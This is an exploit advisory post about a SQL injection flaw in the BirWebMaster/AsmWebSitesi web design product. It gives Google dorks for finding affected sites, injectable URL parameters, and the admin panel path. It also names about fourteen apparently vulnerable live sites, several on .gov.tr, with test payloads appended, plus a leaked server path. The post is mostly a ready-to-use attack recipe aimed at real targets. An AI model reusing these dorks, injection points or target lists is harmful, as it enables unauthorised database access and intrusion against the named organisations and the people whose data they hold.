facebook facebook twitter rss

BirWebMaster AsmWebSitesi Graphics Web Design Services SQL Injection Vulnerability

Author: KingSkrupellos , Published: 10-10-2018
# Exploit Title : BirWebMaster AsmWebSitesi Graphics Web Design Services SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : asmwebsitesi.net ~ birwebmaster.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060362

#################################################################################################

# Google Dorks :

inurl:''/index.php?sayfa=DuyuruOku''

intext:''Asmwebsitesi.net Asm Web Sitesi''

intext:''BirWebMaster Web Tasarım Hizmetleri''

# Exploits :

/index.php?sayfa=DuyuruOku&id=[SQL Inj]

/index.php?sayfa=SayfaOku&SayfaId=[SQL Inj]

/index.php?sayfa=Galeri&islem=ResimGoster&id=[ID-NUMBER]&page=[SQL Inj]

# Admin Login Panel Path : /admin/index.php

#################################################################################################

# Example Vulnerable SQL Sites =>

bestelsizasm.com/index.php?sayfa=DuyuruOku&id=2%27

tekkirazasm.com/index.php?sayfa=DuyuruOku&id=2%27

sabanozuasm.com/index.php?sayfa=DuyuruOku&id=2%27

sahinciliasm.com/index.php?sayfa=DuyuruOku&id=3%27

musguzeltepeasm.com/index.php?sayfa=DuyuruOku&id=11%27

kitreliasm.com/index.php?sayfa=DuyuruOku&id=12%27

cumhuriyetasm.gov.tr/index.php?sayfa=DuyuruOku&id=1%27

emirefendiasm.gov.tr/index.php?sayfa=DuyuruOku&id=1%27

mervesehirasm.gov.tr/index.php?sayfa=DuyuruOku&id=1%27

idil1noluasm.com/index.php?sayfa=DuyuruOku&id=7%27

ercis5noluasm.com/index.php?sayfa=DuyuruOku&id=1%27

hasancikasm.com/index.php?sayfa=DuyuruOku&id=2%27

islamdagasm.com/index.php?sayfa=DuyuruOku&id=13%27

tokiavrupaasm.com/index.php?sayfa=DuyuruOku&id=2%27

[ Proof of Concept for SQL Inj ] => archive.is/Jvfcu

# SQL Database Error =>

Warning: session_start(): Cannot send session cache limiter - headers already sent
(output started at /home/cumasm/public_html/index.php:1) in /home/cumasm/public_html/db.php on line 7

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :